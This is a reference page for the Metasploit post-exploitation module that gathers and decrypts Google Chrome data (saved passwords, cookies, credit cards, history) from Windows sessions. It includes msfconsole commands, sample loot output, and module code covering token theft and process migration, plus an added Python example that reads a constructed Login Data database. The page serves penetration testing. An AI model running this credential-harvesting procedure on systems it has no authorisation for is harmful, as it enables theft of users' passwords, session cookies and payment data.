Windows Gather Google Chrome User Data Enumeration - Metasploit
This page contains detailed information about how to use the post/windows/gather/enum_chrome metasploit module. For a list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Windows Gather Google Chrome User Data Enumeration
Module: post/windows/gather/enum_chrome
Source code: modules/post/windows/gather/enum_chrome.rb
Disclosure date: -
Last modification time: 2022-02-18 02:45:09 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module will collect user data from Google Chrome and attempt to decrypt sensitive information.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/windows/gather/enum_chrome
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/windows/gather/enum_chrome
msf post(enum_chrome) > show options
... show and set options ...
msf post(enum_chrome) > set SESSION session-id
msf post(enum_chrome) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/enum_chrome")
  run_single("set SESSION #{sid}")
  run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
This post-exploitation module will extract saved user data from Google Chrome and attempt to decrypt sensitive information. Chrome encrypts sensitive data (passwords and credit card information) so that it can only be decrypted under the logon credentials of the user who saved it. This module tries to decrypt the sensitive data as the current user unless told otherwise via the MIGRATE setting.
Verification Steps
- Start msfconsole
- Get a meterpreter session
- Do: use post/windows/gather/enum_chrome
- Do: set SESSION <session id>
- Do: run
- You should be able to see the extracted Chrome browser data in the loot files in JSON format
Options
MIGRATE - Migrate automatically to explorer.exe. This is useful if you have SYSTEM privileges, because the process on the target system running meterpreter needs to be owned by the user the data belongs to. If activated, the migration is done using the metasploit post/windows/manage/migrate module. The default value is false.
SESSION - The session to run the module on.
Extracted data
- Web data:
- General autofill data
- Chrome users
- Credit card data
- Cookies
- History
- URL history
- Download history
- Search term history
- Login data (username/password)
- Bookmarks
- Preferences
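As an added illustration of what the "Login Data" file listed above actually holds (example code written for this page, not part of the Metasploit module): it builds a constructed three-row stand-in for Chrome's Login Data SQLite database and enumerates it, labelling each password_value by its protection scheme rather than decrypting it. The DPAPI blob header and the v10/v11 AES-GCM prefix of newer Chrome builds are assumptions taken from Chrome's on-disk format, not from this page; the sample rows and the reduced column set are constructed.

```python
import os
import sqlite3
import tempfile
from pathlib import Path

# DPAPI blob header: version 1 followed by the provider GUID
# {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} in its on-disk byte order.
DPAPI_HEADER = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")

def build_sample_login_data(path):
    """Write a constructed stand-in for Chrome's 'Login Data' file (only the
    three columns this example reads; the real table has many more)."""
    con = sqlite3.connect(path)
    con.execute("CREATE TABLE logins (origin_url TEXT, username_value TEXT, password_value BLOB)")
    con.executemany("INSERT INTO logins VALUES (?, ?, ?)", [
        ("https://mail.example.test/login", "alice", DPAPI_HEADER + b"\x00" * 16),  # constructed
        ("https://intranet.example.test/", "bob", b"v10" + b"\x11" * 28),          # constructed
        ("http://legacy.example.test/", "carol", b"plaintext-secret"),             # constructed
    ])
    con.commit()
    con.close()

def classify_password_blob(blob):
    """Name the protection scheme from the blob prefix without decrypting anything."""
    if blob.startswith(DPAPI_HEADER):
        return "dpapi"        # only the owning user's logon context can unwrap this
    if blob[:3] in (b"v10", b"v11"):
        return "aes-gcm"      # newer Chrome: AES-GCM, key DPAPI-wrapped in Local State
    return "unprotected"

def enumerate_logins(path):
    """Return (origin_url, username, protection) for every saved login."""
    # Open read-only through a URI so a live profile is never modified.
    con = sqlite3.connect(Path(path).as_uri() + "?mode=ro", uri=True)
    try:
        rows = con.execute("SELECT origin_url, username_value, password_value FROM logins").fetchall()
    finally:
        con.close()
    return [(url, user, classify_password_blob(bytes(pw))) for url, user, pw in rows]

def demo():
    """Build the sample database in a temp dir and enumerate it."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "Login Data")
        build_sample_login_data(path)
        return enumerate_logins(path)

if __name__ == "__main__":
    for url, user, kind in demo():
        print(f"{kind:12} {user:8} {url}")
```

Run against a copy of a real profile, the "dpapi" rows are exactly the ones this module can only decrypt after impersonating or migrating into the owning user's process.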
Scenarios
Meterpreter session as normal user
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.104:51129) at 2016-10-13 20:45:50 +0200
msf exploit(handler) > use post/windows/gather/enum_chrome
msf post(enum_chrome) > set SESSION 1
SESSION => 1
msf post(enum_chrome) > run
[*] Impersonating token: 3156
[*] Running as user 'user-PC\user'...
[*] Extracting data for user 'user'...
[*] Downloaded Web Data to '/home/user/.msf4/loot/20161013205236_default_192.168.1.18_chrome.raw.WebD_032796.txt'
[*] Downloaded Cookies to '/home/user/.msf4/loot/20161013205238_default_192.168.1.18_chrome.raw.Cooki_749912.txt'
[*] Downloaded History to '/home/user/.msf4/loot/20161013205244_default_192.168.1.18_chrome.raw.Histo_307144.txt'
[*] Downloaded Login Data to '/home/user/.msf4/loot/20161013205309_default_192.168.1.18_chrome.raw.Login_519738.txt'
[*] Downloaded Bookmarks to '/home/user/.msf4/loot/20161013205310_default_192.168.1.18_chrome.raw.Bookm_593102.txt'
[*] Downloaded Preferences to '/home/user/.msf4/loot/20161013205311_default_192.168.1.18_chrome.raw.Prefe_742084.txt'
[*] Decrypted data saved in: /home/user/.msf4/loot/20161013205909_default_192.168.1.18_chrome.decrypted_173440.txt
[*] Post module execution completed
Meterpreter session as system
In this case, you should set the MIGRATE setting to true. The module will try to migrate to explorer.exe to decrypt the encrypted data. After the decryption is done, the script will migrate back into the original process.
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.104:51129) at 2016-10-13 20:45:50 +0200
msf exploit(handler) > use post/windows/gather/enum_chrome
msf post(enum_chrome) > set SESSION 1
SESSION => 1
msf post(enum_chrome) > set MIGRATE true
MIGRATE => true
msf post(enum_chrome) > run
[*] current PID is 1100. migrating into explorer.exe, PID=2916...
[*] done.
[*] Running as user 'user-PC\user'...
[*] Extracting data for user 'user'...
[*] Downloaded Web Data to '/home/user/.msf4/loot/20161013205236_default_192.168.1.18_chrome.raw.WebD_032796.txt'
[*] Downloaded Cookies to '/home/user/.msf4/loot/20161013205238_default_192.168.1.18_chrome.raw.Cooki_749912.txt'
[*] Downloaded History to '/home/user/.msf4/loot/20161013205244_default_192.168.1.18_chrome.raw.Histo_307144.txt'
[*] Downloaded Login Data to '/home/user/.msf4/loot/20161013205309_default_192.168.1.18_chrome.raw.Login_519738.txt'
[*] Downloaded Bookmarks to '/home/user/.msf4/loot/20161013205310_default_192.168.1.18_chrome.raw.Bookm_593102.txt'
[*] Downloaded Preferences to '/home/user/.msf4/loot/20161013205311_default_192.168.1.18_chrome.raw.Prefe_742084.txt'
[*] Decrypted data saved in: /home/user/.msf4/loot/20161013205909_default_192.168.1.18_chrome.decrypted_173440.txt
[*] migrating back into PID=1100...
[*] done.
[*] Post module execution completed
Msfconsole Usage
Here is how the windows/gather/enum_chrome post exploitation module looks in the msfconsole:
msf6 > use post/windows/gather/enum_chrome
msf6 post(windows/gather/enum_chrome) > show info
Name: Windows Gather Google Chrome User Data Enumeration
Module: post/windows/gather/enum_chrome
Platform: Windows
Arch:
Rank: Normal
Provided by:
Sven Taute
sinn3r <[email protected]>
Kx499
mubix <[email protected]>
Compatible session types:
Meterpreter
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
MIGRATE false no Automatically migrate to explorer.exe
SESSION yes The session to run this module on.
Description:
This module will collect user data from Google Chrome and attempt to
decrypt sensitive information.
Module Options
This is a complete list of options available in the windows/gather/enum_chrome post exploitation module:
msf6 post(windows/gather/enum_chrome) > show options
Module options (post/windows/gather/enum_chrome):
Name Current Setting Required Description
---- --------------- -------- -----------
MIGRATE false no Automatically migrate to explorer.exe
SESSION yes The session to run this module on.
Advanced Options
Here is a complete list of advanced options supported by the windows/gather/enum_chrome post exploitation module:
msf6 post(windows/gather/enum_chrome) > show advanced
Module advanced options (post/windows/gather/enum_chrome):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the windows/gather/enum_chrome module can do:
msf6 post(windows/gather/enum_chrome) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the windows/gather/enum_chrome post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(windows/gather/enum_chrome) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the following error messages:
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
==> Mailvelope database not found
Here is a relevant code snippet related to the "==> Mailvelope database not found" error message:
def extension_mailvelope(username, extname)
  chrome_path = @profiles_path + "\\" + username + @data_path
  maildb_path = chrome_path + "/Local Storage/chrome-extension_#{extname}_0.localstorage"
  if file_exist?(maildb_path) == false
    print_error("==> Mailvelope database not found")
    return
  end
  print_status("==> Downloading Mailvelope database...")
  local_path = store_loot("chrome.ext.mailvelope", "text/plain", session, "chrome_ext_mailvelope")
  session.fs.file.download_file(local_path, maildb_path)
<F> not found
Here is a relevant code snippet related to the "<F> not found" error message:
@chrome_files.map { |e| e[:in_file] }.uniq.each do |f|
  remote_path = chrome_path + '\\' + f

  # Verify the path before downloading the file
  if file_exist?(remote_path) == false
    print_error("#{f} not found")
    next
  end

  # Store raw data
  local_path = store_loot("chrome.raw.#{f}", "text/plain", session, "chrome_raw_#{f}")
No explorer.exe process to impersonate.
Here is a relevant code snippet related to the "No explorer.exe process to impersonate." error message:
current_pid = session.sys.process.open.pid
target_pid = session.sys.process["explorer.exe"]
return if target_pid == current_pid

if target_pid.to_s.empty?
  print_warning("No explorer.exe process to impersonate.")
  return
end

print_status("Impersonating token: #{target_pid}")
begin
Cannot impersonate: <E.MESSAGE.TO_S>
Here is a relevant code snippet related to the "Cannot impersonate: <E.MESSAGE.TO_S>" error message:
  print_status("Impersonating token: #{target_pid}")
  begin
    session.sys.config.steal_token(target_pid)
    return true
  rescue Rex::Post::Meterpreter::RequestError => e
    print_error("Cannot impersonate: #{e.message.to_s}")
    return false
  end
end

def migrate(pid = nil)
(Automatic decryption will not be possible. You might want to manually migrate, or set "MIGRATE=true")
Here is a relevant code snippet related to the "(Automatic decryption will not be possible. You might want to manually migrate, or set "MIGRATE=true")" error message:
# Get user(s)
usernames = []
if is_system?
  print_status("Running as SYSTEM, extracting user list...")
  print_warning("(Automatic decryption will not be possible. You might want to manually migrate, or set \"MIGRATE=true\")")
  session.fs.dir.foreach(@profiles_path) do |u|
    not_actually_users = [
      ".", "..", "All Users", "Default", "Default User", "Public", "desktop.ini",
      "LocalService", "NetworkService"
    ]
SQLite3 is not available, and we are not able to parse the database.
Here is a relevant code snippet related to the "SQLite3 is not available, and we are not able to parse the database." error message:
has_sqlite3 = true
begin
  require 'sqlite3'
rescue LoadError
  print_warning("SQLite3 is not available, and we are not able to parse the database.")
  has_sqlite3 = false
end

# Process files for each username
usernames.each do |u|
Related Pull Requests
- #9010 Merged Pull Request: remove checks for hardcoded SYSTEM Account name
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #7200 Merged Pull Request: Rex::Ui::Text cleanup
- #6997 Merged Pull Request: Avoid exception on missing key in prefs.
- #6668 Merged Pull Request: Fix #6569, Add a check for USERNAME env var in enum_chrome post mod
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #6644 Merged Pull Request: Preserve default types for datastore options
- #2782 Merged Pull Request: Stop abusing expand path
- #2525 Merged Pull Request: Change module boilerplate
- #2304 Merged Pull Request: Fix load order in posts, hopefully forever
- #2243 Merged Pull Request: [FixRM #8312] - Fix file handle leaks
- #1241 Merged Pull Request: Removed all $Id$ and $Revision$ occurences
- #958 Merged Pull Request: Msftidy 2
See Also
Check also the following modules related to this module:
- post/windows/gather/enum_ad_bitlocker
- post/windows/gather/enum_ad_computers
- post/windows/gather/enum_ad_groups
- post/windows/gather/enum_ad_managedby_groups
- post/windows/gather/enum_ad_service_principal_names
- post/windows/gather/enum_ad_to_wordlist
- post/windows/gather/enum_ad_user_comments
- post/windows/gather/enum_ad_users
- post/windows/gather/enum_applications
- post/windows/gather/enum_artifacts
- post/windows/gather/enum_av
- post/windows/gather/enum_av_excluded
- post/windows/gather/enum_chocolatey_applications
- post/windows/gather/enum_computers
- post/windows/gather/enum_db
- post/windows/gather/enum_devices
- post/windows/gather/enum_dirperms
- post/windows/gather/enum_domain
- post/windows/gather/enum_domain_group_users
- post/windows/gather/enum_domains
- post/windows/gather/enum_domain_tokens
- post/windows/gather/enum_domain_users
- post/windows/gather/enum_emet
- post/windows/gather/enum_files
- post/windows/gather/enum_hostfile
- post/windows/gather/enum_hyperv_vms
- post/windows/gather/enum_ie
- post/windows/gather/enum_logged_on_users
- post/windows/gather/enum_ms_product_keys
- post/windows/gather/enum_muicache
- post/windows/gather/enum_onedrive
- post/windows/gather/enum_patches
- post/windows/gather/enum_powershell_env
- post/windows/gather/enum_prefetch
- post/windows/gather/enum_proxy
- post/windows/gather/enum_putty_saved_sessions
- post/windows/gather/enum_services
- post/windows/gather/enum_shares
- post/windows/gather/enum_snmp
- post/windows/gather/enum_termserv
- post/windows/gather/enum_tokens
- post/windows/gather/enum_tomcat
- post/windows/gather/enum_trusted_locations
- post/windows/gather/enum_unattend
Authors
- Sven Taute
- sinn3r
- Kx499
- mubix
Version
This page has been produced using Metasploit Framework version 6.1.41-dev. For more modules, visit the Metasploit Module Library.